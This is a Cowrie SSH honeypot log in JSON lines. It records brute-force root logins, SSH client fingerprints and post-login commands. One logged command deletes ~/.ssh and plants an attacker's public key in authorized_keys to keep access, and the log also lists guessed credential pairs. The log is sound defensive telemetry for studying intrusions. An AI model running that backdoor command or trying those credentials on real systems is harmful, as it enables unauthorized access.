{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:27:44.102155Z","src_ip":"212.227.125.160","session":"737d0d14b6d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:27:46.047933Z","src_ip":"212.227.235.229","session":"c383fffb3369"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:27:46.048627Z","src_ip":"212.227.235.229","session":"c383fffb3369"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47896,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c31d9d09dbb","protocol":"ssh","message":"New connection: 212.227.125.160:47896 (1.2.3.4:22) [session: 4c31d9d09dbb]","sensor":"my-vps","timestamp":"2025-08-31T05:27:54.060046Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"11.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:27:57.161489Z","src_ip":"212.227.235.229","session":"c383fffb3369"}
{"eventid":"cowrie.session.closed","duration":"113.3","message":"Connection lost after 113.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:27:57.162612Z","src_ip":"212.227.235.229","session":"c383fffb3369"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45444,"dst_ip":"1.2.3.4","dst_port":22,"session":"091fec18004e","protocol":"ssh","message":"New connection: 212.227.235.229:45444 (1.2.3.4:22) [session: 091fec18004e]","sensor":"my-vps","timestamp":"2025-08-31T05:27:58.223213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:27:58.224184Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:27:58.495577Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.login.success","username":"root","password":"syhhidc","message":"login attempt [root/syhhidc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:27:59.623626Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:28:00.183500Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:28:00.184291Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:28:00.185475Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:00.457959Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:28:01.557091Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:28:01.557801Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:28:01.831805Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:01.832663Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46878,"dst_ip":"1.2.3.4","dst_port":22,"session":"366daa8f2074","protocol":"ssh","message":"New connection: 212.227.235.229:46878 (1.2.3.4:22) [session: 366daa8f2074]","sensor":"my-vps","timestamp":"2025-08-31T05:28:02.103450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:28:02.110203Z","src_ip":"212.227.235.229","session":"366daa8f2074"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:28:02.340826Z","src_ip":"212.227.125.160","session":"4c31d9d09dbb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:28:02.342267Z","src_ip":"212.227.125.160","session":"4c31d9d09dbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:28:02.382053Z","src_ip":"212.227.235.229","session":"366daa8f2074"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:28:03.471431Z","src_ip":"212.227.235.229","session":"366daa8f2074"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:04.746811Z","src_ip":"212.227.235.229","session":"366daa8f2074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47894,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fd25333e584","protocol":"ssh","message":"New connection: 212.227.235.229:47894 (1.2.3.4:22) [session: 2fd25333e584]","sensor":"my-vps","timestamp":"2025-08-31T05:28:05.017689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:28:05.018611Z","src_ip":"212.227.235.229","session":"2fd25333e584"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:28:05.289946Z","src_ip":"212.227.235.229","session":"2fd25333e584"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:28:05.450873Z","src_ip":"212.227.125.160","session":"737d0d14b6d5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:28:05.451596Z","src_ip":"212.227.125.160","session":"737d0d14b6d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35484,"dst_ip":"1.2.3.4","dst_port":22,"session":"403d75958f9b","protocol":"ssh","message":"New connection: 212.227.235.229:35484 (1.2.3.4:22) [session: 403d75958f9b]","sensor":"my-vps","timestamp":"2025-08-31T05:28:05.566303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:28:06.352552Z","src_ip":"212.227.235.229","session":"403d75958f9b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:28:06.353716Z","src_ip":"212.227.235.229","session":"403d75958f9b"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:28:06.356124Z","src_ip":"212.227.235.229","session":"50a1cc396725"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:28:06.378149Z","src_ip":"212.227.235.229","session":"2fd25333e584"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:06.651298Z","src_ip":"212.227.235.229","session":"091fec18004e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:06.652132Z","src_ip":"212.227.235.229","session":"2fd25333e584"}
{"eventid":"cowrie.login.failed","username":"test","password":"welcome","message":"login attempt [test/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:28:12.426947Z","src_ip":"212.227.235.229","session":"403d75958f9b"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:14.192425Z","src_ip":"212.227.235.229","session":"403d75958f9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"12.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 12.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:18.193019Z","src_ip":"212.227.125.160","session":"737d0d14b6d5"}
{"eventid":"cowrie.session.closed","duration":"109.0","message":"Connection lost after 109.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:18.194349Z","src_ip":"212.227.125.160","session":"737d0d14b6d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43804,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1c03df960e8","protocol":"ssh","message":"New connection: 212.227.235.229:43804 (1.2.3.4:22) [session: a1c03df960e8]","sensor":"my-vps","timestamp":"2025-08-31T05:28:21.881850Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53606,"dst_ip":"1.2.3.4","dst_port":22,"session":"22625965e567","protocol":"ssh","message":"New connection: 212.227.125.160:53606 (1.2.3.4:22) [session: 22625965e567]","sensor":"my-vps","timestamp":"2025-08-31T05:28:27.034732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:28:27.383042Z","src_ip":"212.227.125.160","session":"22625965e567"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:28:27.383732Z","src_ip":"212.227.125.160","session":"22625965e567"}
{"eventid":"cowrie.login.failed","username":"test","password":"welcome","message":"login attempt [test/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:28:29.737928Z","src_ip":"212.227.125.160","session":"22625965e567"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:28:29.772393Z","src_ip":"212.227.235.229","session":"50a1cc396725"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:28:29.773181Z","src_ip":"212.227.235.229","session":"50a1cc396725"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:31.211820Z","src_ip":"212.227.125.160","session":"22625965e567"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:28:33.808887Z","src_ip":"212.227.235.229","session":"a1c03df960e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:28:33.810156Z","src_ip":"212.227.235.229","session":"a1c03df960e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38060,"dst_ip":"1.2.3.4","dst_port":22,"session":"8508783fc89d","protocol":"ssh","message":"New connection: 212.227.235.229:38060 (1.2.3.4:22) [session: 8508783fc89d]","sensor":"my-vps","timestamp":"2025-08-31T05:28:39.414898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:28:39.415997Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:28:39.498931Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
